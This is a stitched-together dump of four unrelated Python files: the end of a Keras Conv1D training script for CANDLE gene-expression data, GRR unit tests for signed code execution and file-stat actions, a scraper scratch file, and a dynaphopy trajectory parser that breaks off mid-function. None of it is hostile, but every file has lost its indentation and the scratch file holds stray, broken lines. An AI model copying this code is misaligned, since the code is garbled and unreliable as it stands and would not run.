X_test = df_x_test
scaler = MaxAbsScaler()
mat = np.concatenate((X_train, X_test), axis=0)
mat = scaler.fit_transform(mat)
X_train = mat[:X_train.shape[0], :]
X_test = mat[X_train.shape[0]:, :]
# TODO: Add better names for noise boolean, make a featue for both RNA seq and label noise together
# check if noise is on (this is for label)
if gParameters['add_noise']:
# check if we want noise correlated with a feature
if gParameters['noise_correlated']:
Y_train, y_train_noise_gen = candle.label_flip_correlated(Y_train,
gParameters['label_noise'], X_train,
gParameters['feature_col'],
gParameters['feature_threshold'])
# else add uncorrelated noise
else:
Y_train, y_train_noise_gen = candle.label_flip(Y_train, gParameters['label_noise'])
# check if noise is on for RNA-seq data
elif gParameters['noise_gaussian']:
X_train = candle.add_gaussian_noise(X_train, 0, gParameters['std_dev'])
return X_train, Y_train, X_test, Y_test
def run(gParameters):
file_train = gParameters['train_data']
file_test = gParameters['test_data']
url = gParameters['data_url']
train_file = candle.get_file(file_train, url + file_train, cache_subdir='Pilot1')
test_file = candle.get_file(file_test, url + file_test, cache_subdir='Pilot1')
model = Sequential()
initial_epoch = 0
best_metric_last = None
X_train, Y_train, X_test, Y_test = load_data(train_file, test_file, gParameters)
print('X_train shape:', X_train.shape)
print('X_test shape:', X_test.shape)
print('Y_train shape:', Y_train.shape)
print('Y_test shape:', Y_test.shape)
x_train_len = X_train.shape[1]
# this reshaping is critical for the Conv1D to work
X_train = np.expand_dims(X_train, axis=2)
X_test = np.expand_dims(X_test, axis=2)
print('X_train shape:', X_train.shape)
print('X_test shape:', X_test.shape)
layer_list = list(range(0, len(gParameters['conv']), 3))
for _, i in enumerate(layer_list):
filters = gParameters['conv'][i]
filter_len = gParameters['conv'][i + 1]
stride = gParameters['conv'][i + 2]
print(int(i / 3), filters, filter_len, stride)
if gParameters['pool']:
pool_list = gParameters['pool']
if type(pool_list) != list:
pool_list = list(pool_list)
if filters <= 0 or filter_len <= 0 or stride <= 0:
break
if 'locally_connected' in gParameters:
model.add(LocallyConnected1D(filters, filter_len, strides=stride, padding='valid', input_shape=(x_train_len, 1)))
else:
# input layer
if i == 0:
model.add(Conv1D(filters=filters, kernel_size=filter_len, strides=stride, padding='valid', input_shape=(x_train_len, 1)))
else:
model.add(Conv1D(filters=filters, kernel_size=filter_len, strides=stride, padding='valid'))
model.add(Activation(gParameters['activation']))
if gParameters['pool']:
model.add(MaxPooling1D(pool_size=pool_list[int(i / 3)]))
model.add(Flatten())
for layer in gParameters['dense']:
if layer:
model.add(Dense(layer))
model.add(Activation(gParameters['activation']))
if gParameters['dropout']:
model.add(Dropout(gParameters['dropout']))
model.add(Dense(gParameters['classes']))
model.add(Activation(gParameters['out_activation']))
J = candle.restart(gParameters, model)
if J is not None:
initial_epoch = J['epoch']
best_metric_last = J['best_metric_last']
gParameters['ckpt_best_metric_last'] = best_metric_last
print('initial_epoch: %i' % initial_epoch)
ckpt = candle.CandleCheckpointCallback(gParameters,
verbose=False)
# Reference case
# model.add(Conv1D(filters=128, kernel_size=20, strides=1, padding='valid', input_shape=(P, 1)))
# model.add(Activation('relu'))
# model.add(MaxPooling1D(pool_size=1))
# model.add(Conv1D(filters=128, kernel_size=10, strides=1, padding='valid'))
# model.add(Activation('relu'))
# model.add(MaxPooling1D(pool_size=10))
# model.add(Flatten())
# model.add(Dense(200))
# model.add(Activation('relu'))
# model.add(Dropout(0.1))
# model.add(Dense(20))
# model.add(Activation('relu'))
# model.add(Dropout(0.1))
# model.add(Dense(CLASSES))
# model.add(Activation('softmax'))
kerasDefaults = candle.keras_default_config()
# Define optimizer
optimizer = candle.build_optimizer(gParameters['optimizer'],
gParameters['learning_rate'],
kerasDefaults)
model.summary()
model.compile(loss=gParameters['loss'],
optimizer=optimizer,
metrics=[gParameters['metrics']])
output_dir = gParameters['output_dir']
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# calculate trainable and non-trainable params
gParameters.update(candle.compute_trainable_params(model))
# set up a bunch of callbacks to do work during model training..
model_name = gParameters['model_name']
# path = '{}/{}.autosave.model.h5'.format(output_dir, model_name)
# checkpointer = ModelCheckpoint(filepath=path, verbose=1, save_weights_only=False, save_best_only=True)
csv_logger = CSVLogger('{}/training.log'.format(output_dir))
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, verbose=1, mode='auto', epsilon=0.0001, cooldown=0, min_lr=0)
candleRemoteMonitor = candle.CandleRemoteMonitor(params=gParameters)
timeoutMonitor = candle.TerminateOnTimeOut(gParameters['timeout'])
history = model.fit(X_train, Y_train,
batch_size=gParameters['batch_size'],
epochs=gParameters['epochs'],
initial_epoch=initial_epoch,
verbose=1,
validation_data=(X_test, Y_test),
callbacks=[csv_logger, reduce_lr, candleRemoteMonitor, timeoutMonitor,
ckpt])
score = model.evaluate(X_test, Y_test, verbose=0)
if False:
print('Test score:', score[0])
print('Test accuracy:', score[1])
# serialize model to JSON
model_json = model.to_json()
with open("{}/{}.model.json".format(output_dir, model_name), "w") as json_file:
json_file.write(model_json)
# serialize model to YAML
model_yaml = model.to_yaml()
with open("{}/{}.model.yaml".format(output_dir, model_name), "w") as yaml_file:
yaml_file.write(model_yaml)
# serialize weights to HDF5
model.save_weights("{}/{}.weights.h5".format(output_dir, model_name))
print("Saved model to disk")
# load json and create model
json_file = open('{}/{}.model.json'.format(output_dir, model_name), 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model_json = model_from_json(loaded_model_json)
# load yaml and create model
yaml_file = open('{}/{}.model.yaml'.format(output_dir, model_name), 'r')
loaded_model_yaml = yaml_file.read()
yaml_file.close()
loaded_model_yaml = model_from_yaml(loaded_model_yaml)
# load weights into new model
loaded_model_json.load_weights('{}/{}.weights.h5'.format(output_dir, model_name))
print("Loaded json model from disk")
# evaluate json loaded model on test data
loaded_model_json.compile(loss=gParameters['loss'],
optimizer=gParameters['optimizer'],
metrics=[gParameters['metrics']])
score_json = loaded_model_json.evaluate(X_test, Y_test, verbose=0)
print('json Test score:', score_json[0])
print('json Test accuracy:', score_json[1])
print("json %s: %.2f%%" % (loaded_model_json.metrics_names[1], score_json[1] * 100))
# load weights into new model
loaded_model_yaml.load_weights('{}/{}.weights.h5'.format(output_dir, model_name))
print("Loaded yaml model from disk")
# evaluate loaded model on test data
loaded_model_yaml.compile(loss=gParameters['loss'],
optimizer=gParameters['optimizer'],
metrics=[gParameters['metrics']])
score_yaml = loaded_model_yaml.evaluate(X_test, Y_test, verbose=0)
print('yaml Test score:', score_yaml[0])
print('yaml Test accuracy:', score_yaml[1])
print("yaml %s: %.2f%%" % (loaded_model_yaml.metrics_names[1], score_yaml[1] * 100))
return history
def main():
gParameters = initialize_parameters()
run(gParameters)
if __name__ == '__main__':
main()
try:
K.clear_session()
except AttributeError: # theano does not have this function
pass
|
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Test client standard actions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import hashlib
import io
import sys
from absl import app
import mock
from grr_response_client.client_actions import standard
from grr_response_core import config
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.rdfvalues import client_action as rdf_client_action
from grr_response_core.lib.rdfvalues import crypto as rdf_crypto
from grr_response_core.lib.rdfvalues import flows as rdf_flows
from grr_response_core.lib.rdfvalues import paths as rdf_paths
from grr_response_core.lib.rdfvalues import protodict as rdf_protodict
from grr_response_core.lib.util import temp
from grr.test_lib import action_mocks
from grr.test_lib import client_test_lib
from grr.test_lib import filesystem_test_lib
from grr.test_lib import test_lib
class TestExecutePython(client_test_lib.EmptyActionTest):
"""Test the client execute actions."""
def setUp(self):
super(TestExecutePython, self).setUp()
self.signing_key = config.CONFIG[
"PrivateKeys.executable_signing_private_key"]
def testExecutePython(self):
"""Test the basic ExecutePython action."""
utils.TEST_VAL = "original"
python_code = "utils.TEST_VAL = 'modified'"
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
result = self.RunAction(standard.ExecutePython, request)[0]
self.assertGreater(result.time_used, 0)
self.assertEqual(result.return_val, "")
self.assertEqual(utils.TEST_VAL, "modified")
def testExecutePythonEnvironment(self):
"""Test the basic ExecutePython action."""
python_code = """
import io
import uu
import binascii
def decode(encoded):
# Use the import (uu) inside a function. This will fail if the environment
# for exec is not set up properly.
i = io.BytesIO(s)
o = io.BytesIO()
uu.decode(i, o)
return o.getvalue()
s = "626567696e20363636202d0a2c3226354c3b265c4035565d523b2630410a200a656e640a"
s = binascii.unhexlify(s.encode("ascii"))
magic_return_str = decode(s)
"""
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
result = self.RunAction(standard.ExecutePython, request)[0]
self.assertGreater(result.time_used, 0)
self.assertEqual(result.return_val, "Hello World!")
def testStdoutHooking(self):
python_code = """
def f(n):
print("F called: %s" % n)
print("Calling f.")
f(1)
print("Done.")
"""
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
result = self.RunAction(standard.ExecutePython, request)[0]
self.assertGreater(result.time_used, 0)
self.assertEqual(result.return_val, "Calling f.\nF called: 1\nDone.\n")
def testProgress(self):
python_code = """
def f():
# This should also work inside a function.
Progress()
f()
Progress()
print("Done.")
"""
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
result = self.RunAction(standard.ExecutePython, request)[0]
self.assertGreater(result.time_used, 0)
self.assertEqual(result.return_val, "Done.\n")
def testExecuteModifiedPython(self):
"""Test that rejects invalid ExecutePython action."""
utils.TEST_VAL = "original"
python_code = "utils.TEST_VAL = 'modified'"
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
# Modify the data so the signature does not match.
signed_blob.data = b"utils.TEST_VAL = 'notmodified'"
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
# Should raise since the code has been modified.
self.assertRaises(rdf_crypto.VerificationError, self.RunAction,
standard.ExecutePython, request)
# Lets also adjust the hash.
signed_blob.digest = hashlib.sha256(signed_blob.data).digest()
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
self.assertRaises(rdf_crypto.VerificationError, self.RunAction,
standard.ExecutePython, request)
# Make sure the code never ran.
self.assertEqual(utils.TEST_VAL, "original")
def testExecuteBrokenPython(self):
"""Test broken code raises back to the original flow."""
python_code = "raise ValueError"
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
self.assertRaises(ValueError, self.RunAction, standard.ExecutePython,
request)
def testExecuteBinary(self):
"""Test the basic ExecuteBinaryCommand action."""
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(open("/bin/ls", "rb").read(), self.signing_key)
filepath = __file__.encode(sys.getfilesystemencoding())
request = rdf_client_action.ExecuteBinaryRequest(
executable=signed_blob, args=[filepath], write_path="ablob")
result = self.RunAction(standard.ExecuteBinaryCommand, request)[0]
self.assertGreater(result.time_used, 0)
self.assertIn(filepath, result.stdout)
def testReturnVals(self):
"""Test return values."""
python_code = "magic_return_str = 'return string'"
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
result = self.RunAction(standard.ExecutePython, request)[0]
self.assertEqual(result.return_val, "return string")
def testWrongKey(self):
"""Test return values."""
python_code = "print 'test'"
# Generate a test valid RSA key that isn't the real one.
signing_key = rdf_crypto.RSAPrivateKey.GenerateKey(2048, 65537)
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), signing_key)
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
self.assertRaises(rdf_crypto.VerificationError, self.RunAction,
standard.ExecutePython, request)
def testArgs(self):
"""Test passing arguments."""
utils.TEST_VAL = "original"
python_code = """
magic_return_str = py_args['test']
utils.TEST_VAL = py_args[43]
"""
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
pdict = rdf_protodict.Dict({"test": "dict_arg", 43: "dict_arg2"})
request = rdf_client_action.ExecutePythonRequest(
python_code=signed_blob, py_args=pdict)
result = self.RunAction(standard.ExecutePython, request)[0]
self.assertEqual(result.return_val, "dict_arg")
self.assertEqual(utils.TEST_VAL, "dict_arg2")
class GetFileStatTest(client_test_lib.EmptyActionTest):
def testStatSize(self):
with temp.AutoTempFilePath() as temp_filepath:
with io.open(temp_filepath, "wb") as temp_file:
temp_file.write(b"123456")
pathspec = rdf_paths.PathSpec(
path=temp_filepath, pathtype=rdf_paths.PathSpec.PathType.OS)
request = rdf_client_action.GetFileStatRequest(pathspec=pathspec)
results = self.RunAction(standard.GetFileStat, request)
self.assertLen(results, 1)
self.assertEqual(results[0].st_size, 6)
def testStatExtAttrsEnabled(self):
with temp.AutoTempFilePath() as temp_filepath:
filesystem_test_lib.SetExtAttr(
temp_filepath, name="user.foo", value="bar")
pathspec = rdf_paths.PathSpec(
path=temp_filepath, pathtype=rdf_paths.PathSpec.PathType.OS)
request = rdf_client_action.GetFileStatRequest(
pathspec=pathspec, collect_ext_attrs=True)
results = self.RunAction(standard.GetFileStat, request)
self.assertLen(results, 1)
self.assertLen(results[0].ext_attrs, 1)
self.assertEqual(results[0].ext_attrs[0].name, b"user.foo")
self.assertEqual(results[0].ext_attrs[0].value, b"bar")
def testStatExtAttrsDisabled(self):
with temp.AutoTempFilePath() as temp_filepath:
filesystem_test_lib.SetExtAttr(
temp_filepath, name="user.foo", value="bar")
pathspec = rdf_paths.PathSpec(
path=temp_filepath, pathtype=rdf_paths.PathSpec.PathType.OS)
request = rdf_client_action.GetFileStatRequest(
pathspec=pathspec, collect_ext_attrs=False)
results = self.RunAction(standard.GetFileStat, request)
self.assertLen(results, 1)
self.assertEmpty(results[0].ext_attrs)
class TestNetworkByteLimits(client_test_lib.EmptyActionTest):
"""Test TransferBuffer network byte limits."""
def setUp(self):
super(TestNetworkByteLimits, self).setUp()
pathspec = rdf_paths.PathSpec(
path="/nothing", pathtype=rdf_paths.PathSpec.PathType.OS)
self.buffer_ref = rdf_client.BufferReference(pathspec=pathspec, length=5000)
self.data = b"X" * 500
stubber = mock.patch.object(standard.vfs, "ReadVFS", return_value=self.data)
stubber.start()
self.addCleanup(stubber.stop)
self.transfer_buf = action_mocks.ActionMock(standard.TransferBuffer)
def testTransferNetworkByteLimitError(self):
message = rdf_flows.GrrMessage(
name="TransferBuffer",
payload=self.buffer_ref,
network_bytes_limit=300,
generate_task_id=True)
# We just get a client alert and a status message back.
responses = self.transfer_buf.HandleMessage(message)
client_alert = responses[0].payload
self.assertIn("Network limit exceeded", str(client_alert))
status = responses[1].payload
self.assertIn("Action exceeded network send limit", str(status.backtrace))
self.assertEqual(status.status,
rdf_flows.GrrStatus.ReturnedStatus.NETWORK_LIMIT_EXCEEDED)
def testTransferNetworkByteLimit(self):
message = rdf_flows.GrrMessage(
name="TransferBuffer",
payload=self.buffer_ref,
network_bytes_limit=900,
generate_task_id=True)
responses = self.transfer_buf.HandleMessage(message)
for response in responses:
if isinstance(response, rdf_flows.GrrStatus):
self.assertEqual(response.payload.status,
rdf_flows.GrrStatus.ReturnedStatus.OK)
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
|
import sys
sys.path.append("/Users/pascal/GDrive/sky_package/sky/")
from utils import *
from training import *
from findLeaf import *
from bs4 import BeautifulSoup
def uniqifyOverTraining(list_of_lists):
uniques = []
for x in list_of_lists[0]:
if all([bool(x in y) for y in list_of_lists]):
uniques.append(x)
return uniques
def findParentIdentifiers(x, soup, nLevel=3):
parents = []
try:
for parent_attrs in [parent.attrs for parent in x.parents][:nLevel]:
if len(soup.findAll(**{"attrs" : parent_attrs})) == 1:
parents.append({"attrs" : parent_attrs})
for parent_attrs in [{"name" : parent.name} for parent in x.parents][:nLevel]:
if len(soup.findAll(**{"name" : parent.name})) == 1:
parents.append({"name" : parent.name})
except:
pass
return parents
def findSharedKeyValues(training, trainingLeafs):
case_options = []
for soup, case in zip(training.soups, trainingLeafs):
options = []
for leaf in case:
options.extend(findParentIdentifiers(leaf, soup))
options.extend(findByTag(leaf, soup))
case_options.append(options)
shared_options = []
for option in case_options[0]:
if all([bool(option in case) for case in case_options]):
shared_options.append(option)
return shared_options
def findByTag(node, soup, nLevel=5):
goodTags = []
tags = []
tags.extend([x.name for x in node.parents][:nLevel])
try:
tags.append(node.name)
except:
pass
for tag in tags:
if len(soup.findAll(tag)) == 1:
goodTags.append({"name" : tag})
return goodTags
def secondLevelDown(soup, outcome, unique_keys):
solution = []
num = 0
for unique_key in unique_keys:
num += 1
#attempt = soup
#for key in unique_key: ik denk dat ik hier bedoedle dat ik ook halve matches kan doen
attempt = soup.find(**unique_key)
if attempt.text == outcome:
solution.append([unique_key, BeautifulSoup.get_text])
if stripReasonableWhite(attempt.text) == stripReasonableWhite(outcome):
solution.append([unique_key, BeautifulSoup.get_text, stripReasonableWhite])
splitting = splitN(attempt.text, outcome)
if splitting:
for splitable in splitting:
solution.append([unique_key, BeautifulSoup.get_text, splitSolution(splitable)])
return solution
def stripReasonableWhite(x):
return re.sub(r"\s+", " ", x).strip()
def splitN(txt, outcome):
# consider splitting to get result
txt = stripReasonableWhite(txt)
outcome = stripReasonableWhite(outcome)
splitables = set(txt.replace(outcome, '', 1)) - set(' ')
options = set()
for s in splitables:
for i, x in enumerate(txt.split(s)):
if stripReasonableWhite(x) == stripReasonableWhite(outcome):
options.add((s, i))
return options
def splitSolution(how):
def solution(txt):
return txt.split(how[0])[how[1]]
return solution
def asNumeric(x):
return re.sub("[^0-9]", "", x)
def applySolutionChain(solution, x):
for sol in solution:
if isinstance(sol, dict):
x = x.find(**sol)
else:
x = sol(x)
return x
def buildSolution(training):
res = findLeaf(training)
print("len(res)", len(res))
x = findSharedKeyValues(training, res)
print("len(shared)", len(x))
solutions = secondLevelDown(training.soups[0], training.targets[0], x)
print("len(solutions)", len(solutions))
return solutions
def testAutoScraperSolutions(autoScraper, training, verbose = False):
num = 0
any_succes = False
for solution in autoScraper:
num += 1
if all([applySolutionChain(solution, soup) == target for soup, target in zip(training.soups, training.targets)]):
result = "SUCCESFULL"
any_succes = True
else:
result = "UNSUCCESFULL"
if verbose:
print("Scraper method: ", num, " was ", result)
return any_succes
def tryUniqueID(c, sp):
return len(sp.findAll(c.name, attrs=c.attrs)) == 1
def buildNewSolution(tr):
childs = []
num = 0
options = []
for soup, target in zip(tr.soups, tr.targets):
print('num',num)
num+=1
for c in soup.findChildren():
try:
if c.name not in ['body', 'html']:
if target in c.text:
childs.append([c, len(c.text)])
except:
pass
tmp = []
for i,x in enumerate(childs[::-1]):
if tryUniqueID(x[0], soup):
attrs = x[0].attrs
attrs['name'] = x[0].name
attrs = {'attrs' : attrs}
if x[0].text == target:
tmp.append((attrs, BeautifulSoup.get_text))
elif stripReasonableWhite(x[0].text) == stripReasonableWhite(target):
tmp.append((attrs, BeautifulSoup.get_text, stripReasonableWhite))
elif splitN(x[0].text, target):
for splitable in splitN(x[0].text, target):
tmp.append((attrs, BeautifulSoup.get_text, splitSolution(splitable)))
else:
print(len([y for y in x[0].children]))
else:
print('not unique', len([y for y in x[0].children]))
options.append(tmp)
good_options = []
if options:
for x in options[0]:
if all(x in y for y in options[1:]):
good_options.append(x)
return good_options
#testAutoScraperSolutions(buildSolution(tr), tr, False)
# tr1 = Training("marktplaats-testcase1", "/Users/pascal/GDrive/sky_package/sky/tests/").load()
# tr2 = Training("nieuwsdumper-testcase1", "/Users/pascal/GDrive/sky_package/sky/tests/").load()
# tr3 = Training("nieuwsdumper-testcase2", "/Users/pascal/GDrive/sky_package/sky/tests/").load()
# tr4 = Training("bouwmaterieel-testcase1", "/Users/pascal/GDrive/sky_package/sky/tests/").load()
# tr5 = Training("marktplaats-testcase2", "/Users/pascal/GDrive/sky/sky/tests/")
# tr5.addLinks(["http://www.marktplaats.nl/a/telecommunicatie/mobiele-telefoons-samsung/m861980349-hdc-galaxy-s5-nieuw-in-doos.html?c=a2384ef0ece270f44503df9f8598c624&previousPage=lr",
# "http://www.marktplaats.nl/a/telecommunicatie/mobiele-telefoons-samsung/m862001039-samsung-galaxy-s3-neo.html?c=a2384ef0ece270f44503df9f8598c624&previousPage=lr", "http://www.marktplaats.nl/a/telecommunicatie/mobiele-telefoons-toebehoren-en-onderdelen/m862001036-iphone-3-4-4s-usb-oplaad-snoer.html?c=a2384ef0ece270f44503df9f8598c624&previousPage=lr"])
# tr5.viewAll()
# tr6 = Training("pypi-author", "/Users/pascal/GDrive/sky_package/sky/tests/").load()
# links = ["http://www.forbes.com/sites/rogerkay/2014/11/10/sparkcognition-meets-ibms-watson-starts-conversation/"]
# import justext
# url = "http://www.forbes.com/sites/rogerkay/2014/11/10/sparkcognition-meets-ibms-watson-starts-conversation/"
# html = urllib.urlopen(url).read()
# paragraphs = justext.justext(html, justext.get_stoplist('English'))
# title = "SparkCognition Meets IBM's Watson, Starts Conversation"
# res = []
# for x in paragraphs:
# if not x.is_boilerplate:
# res.append(x.text)
# newres = []
# for x in res[res.index(title)+1:]:
# newres.append(x)
# for x in newres:
# print(x.encode("ascii", "ignore"))
# res = findLeaf(tr3)
# x = findSharedKeyValues(tr3, res)
# secondLevelDown(tr3.soups[0], tr3.targets[0], x)
tr1 = Training("marktplaats-testcase1", "/Users/pascal/GDrive/sky_package/sky/tests/").load()
from collections import Counter
class SoupStats():
def __init__(self, soup):
self.soup = soup
self.counter = Counter()
for child in soup.findChildren():
for atts in child.attrs.items():
k,v = atts
self.counter[atts] += 1
self.counter[k] += 1
self.counter[v] += 1
z = SoupStats(soup)
counter = Counter()
for child in soup.findChildren():
for atts in child.attrs.items():
k,v = atts
counter[k] += 1
if isinstance(v, list):
for l in v:
counter[(k, l)] += 1
counter[l] += 1
counter[(k, " ".join(v))] += 1
else:
counter[atts] += 1
counter[v] += 1
r
import lxml.html
lxml.html.tostring()
html = 'html'
tree = lxml.html.fromstring(html)
tree.findall('.//*')
from lxml.html import HtmlComment # or similar
no_comments=[element for element in tree if not isinstance(element, HtmlComment)]
tr = Training('betterdoctor-doctor-referalls', '/Users/pascal/GDrive/sky_package/sky/tests/').load()
|
|
import mmap
import os
import numpy as np
import dynaphopy.dynamics as dyn
import dynaphopy.atoms as atomtest
from dynaphopy.interface import phonopy_link as pho_interface
def diff_matrix(array_1, array_2, cell_size):
"""
:param array_1: supercell scaled positions respect unit cell
:param array_2: supercell scaled positions respect unit cell
:param cell_size: diference between arrays accounting for periodicity
:return:
"""
array_1_norm = np.array(array_1) / np.array(cell_size, dtype=float)[None,:]
array_2_norm = np.array(array_2) / np.array(cell_size, dtype=float)[None,:]
return array_2_norm - array_1_norm
def check_atoms_order(filename, trajectory_reading_function, structure):
trajectory = trajectory_reading_function(filename,
structure=structure,
initial_cut=0,
end_cut=1
)
# For now average_positions() depends on order of atoms so can't used for this at this time
# In future however this should work
# reference = trajectory.average_positions()
# Only using first step
reference = trajectory.trajectory[0]
template = get_correct_arrangement(reference, structure)
return template
def get_correct_arrangement(reference, structure):
# print structure.get_scaled_positions()
scaled_coordinates = []
for coordinate in reference:
trans = np.dot(coordinate, np.linalg.inv(structure.get_cell()))
#print coordinate.real, trans.real
scaled_coordinates.append(np.array(trans.real, dtype=float))
number_of_cell_atoms = structure.get_number_of_atoms()
number_of_supercell_atoms = len(scaled_coordinates)
supercell_dim = np.array(np.round(np.max(scaled_coordinates, axis=0)), dtype=int)
unit_cell_scaled_coordinates = scaled_coordinates - np.array(scaled_coordinates, dtype=int)
atom_unit_cell_index = []
for coordinate in unit_cell_scaled_coordinates:
# Only works for non symmetric cell (must be changed)
diff = np.abs(np.array([coordinate]*number_of_cell_atoms) - structure.get_scaled_positions())
diff[diff >= 0.5] -= 1.0
diff[diff < -0.5] += 1.0
# print 'diff', diff
# print 'postions', structure.get_scaled_positions()
index = np.argmin(np.linalg.norm(diff, axis=1))
# print 'test', coordinate, index
atom_unit_cell_index.append(index)
atom_unit_cell_index = np.array(atom_unit_cell_index)
# np.savetxt('index.txt', np.sort(atom_unit_cell_index))
# np.savetxt('test.txt', unit_coordinates)
# np.savetxt('test2.txt', np.array([type_0(j, cell_size, number_of_cell_atoms)[:3] for j in range(number_of_supercell_atoms)]))
# print supercell_dim, number_of_supercell_atoms
original_conf = np.array([dynaphopy_order(j, supercell_dim)[:3] for j in range(number_of_supercell_atoms)])
# np.savetxt('original.txt', original_conf)
# np.savetxt('unitcoor.txt', scaled_coordinates)
# print np.array(scaled_coordinates).shape
# print original_conf.shape
template = []
lp_coordinates = []
for i, coordinate in enumerate(scaled_coordinates):
lattice_points_coordinates = coordinate - structure.get_scaled_positions()[atom_unit_cell_index[i]]
# print 'c', i, coordinate, coordinate2
for k in range(3):
if lattice_points_coordinates[k] > supercell_dim[k] - 0.5:
lattice_points_coordinates[k] = lattice_points_coordinates[k] - supercell_dim[k]
if lattice_points_coordinates[k] < -0.5:
lattice_points_coordinates[k] = lattice_points_coordinates[k] + supercell_dim[k]
comparison_cell = np.array([lattice_points_coordinates]*number_of_supercell_atoms)
diference = np.linalg.norm(diff_matrix(original_conf, comparison_cell, supercell_dim), axis=1)
template.append(np.argmin(diference) + atom_unit_cell_index[i]*number_of_supercell_atoms/number_of_cell_atoms)
lp_coordinates.append(lattice_points_coordinates)
template = np.array(template)
# lp_coordinates = np.array(lp_coordinates)
# print original_conf.shape, lp_coordinates.shape, template.shape
# np.savetxt('index2.txt', np.sort(template))
# np.savetxt('index_tot.txt', np.sort(template*number_of_cell_atoms + atom_unit_cell_index))
# inv_template = inverse_template(template)
# inv_template = np.argsort(template)
# dm = diff_matrix(original_conf, lp_coordinates[inv_template], supercell_dim)
# dm = diff_matrix(original_conf[template], lp_coordinates, supercell_dim)
# np.savetxt('template.txt', template)
# np.savetxt('lp.txt', lp_coordinates[inv_template])
# np.savetxt('diff.txt', dm)
if len(np.unique(template)) < len(template):
print ('template failed, auto-order will not be applied')
print ('unique: {} / {}'.format(len(np.unique(template)), len(template)))
return range(len(template))
return template
def dynaphopy_order(i, size):
x = np.mod(i, size[0])
y = np.mod(i, size[0]*size[1])//size[0]
z = np.mod(i, size[0]*size[1]*size[2])//(size[1]*size[0])
k = i//(size[1]*size[0]*size[2])
return np.array([x, y, z, k])
def get_trajectory_parser(file_name, bytes_to_check=1000000):
from dynaphopy.interface.iofile import trajectory_parsers as tp
parsers_keywords = {'vasp_outcar': {'function': tp.read_vasp_trajectory,
'keywords': ['NIONS', 'POMASS', 'direct lattice vectors']},
'lammps_dump': {'function': tp.read_lammps_trajectory,
'keywords': ['ITEM: TIMESTEP', 'ITEM: NUMBER OF ATOMS', 'ITEM: BOX BOUNDS']},
'vasp_xdatcar': {'function': tp.read_VASP_XDATCAR,
'keywords': ['Direct configuration', 'Direct configuration', '=']}}
# Check file exists
if not os.path.isfile(file_name):
print (file_name + ' file does not exist')
exit()
file_size = os.stat(file_name).st_size
# Check available parsers
for parser in parsers_keywords.values():
with open(file_name, "r+b") as f:
file_map = mmap.mmap(f.fileno(), np.min([bytes_to_check, file_size]))
num_test = [file_map.find(keyword.encode()) for keyword in list(parser['keywords'])]
if not -1 in num_test:
return parser['function']
return None
def read_from_file_structure_outcar(file_name):
# Check file exists
if not os.path.isfile(file_name):
print('Structure file does not exist!')
exit()
# Read from VASP OUTCAR file
print('Reading VASP structure')
with open(file_name, "r+b") as f:
# memory-map the file
file_map = mmap.mmap(f.fileno(), 0)
# Setting number of dimensions
number_of_dimensions = 3
# trash reading for guessing primitive cell (Not stable)
if False:
# Reading primitive cell (not sure about this, by default disabled)
position_number = file_map.find(b'PRICEL')
file_map.seek(position_number)
position_number = file_map.find(b'A1')
file_map.seek(position_number)
primitive_cell = [] #Primitive Cell
for i in range (number_of_dimensions):
primitive_cell.append(file_map.readline()
.replace(",", "")
.replace(")", "")
.replace(")","")
.split()[3:number_of_dimensions+3])
primitive_cell = np.array(primitive_cell,dtype="double")
# Reading number of atoms
position_number = file_map.find(b'NIONS =')
file_map.seek(position_number+7)
number_of_atoms = int(file_map.readline())
# Reading atoms per type
position_number = file_map.find(b'ions per type')
file_map.seek(position_number+15)
atoms_per_type = np.array(file_map.readline().split(),dtype=int)
# Reading atoms mass
position_number = file_map.find(b'POMASS =')
atomic_mass_per_type = []
for i in range(atoms_per_type.shape[0]):
file_map.seek(position_number+9+6*i)
atomic_mass_per_type.append(file_map.read(6))
atomic_mass = sum([[atomic_mass_per_type[j]
for i in range(atoms_per_type[j])]
for j in range(atoms_per_type.shape[0])],[])
atomic_mass = np.array(atomic_mass,dtype='double')
# Reading cell
position_number = file_map.find(b'direct lattice vectors')
file_map.seek(position_number)
file_map.readline()
direct_cell = [] #Direct Cell
for i in range (number_of_dimensions):
direct_cell.append(file_map.readline().split()[0:number_of_dimensions])
direct_cell = np.array(direct_cell,dtype='double')
file_map.seek(position_number)
file_map.readline()
reciprocal_cell = [] #Reciprocal cell
for i in range (number_of_dimensions):
reciprocal_cell.append(file_map.readline().split()[number_of_dimensions:number_of_dimensions*2])
reciprocal_cell = np.array(reciprocal_cell,dtype='double')
# Reading positions fractional cartesian
position_number=file_map.find(b'position of ions in fractional coordinates')
file_map.seek(position_number)
file_map.readline()
positions_fractional = []
